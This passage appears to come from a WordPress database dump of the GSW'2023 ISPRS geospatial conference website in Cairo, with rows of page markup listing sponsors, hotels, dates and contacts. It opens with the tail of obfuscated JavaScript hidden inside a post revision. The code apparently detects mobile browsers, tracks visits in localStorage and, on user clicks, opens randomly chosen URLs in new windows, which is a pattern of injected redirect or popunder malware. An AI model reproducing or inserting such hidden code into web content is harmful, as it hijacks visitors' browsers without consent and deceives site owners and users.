u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2023-05-27 08:26:43','2023-05-27 08:26:43','',2675,'https://gsw2023.com/?p=4591',0,'revision','',0),
(4592,1,'2023-06-01 07:56:53','2023-06-01 07:56:53','','خلفية غامقة وفاتحة','','inherit','open','closed','','%d8%ae%d9%84%d9%81%d9%8a%d8%a9-%d8%ba%d8%a7%d9%85%d9%82%d8%a9-%d9%88%d9%81%d8%a7%d8%aa%d8%ad%d8%a9','','','2023-06-01 07:56:53','2023-06-01 07:56:53','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2.jpg',0,'attachment','image/jpeg',0),
(4593,1,'2023-06-01 07:59:22','2023-06-01 07:59:22','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606301318{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p><a href=\"www.vint.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 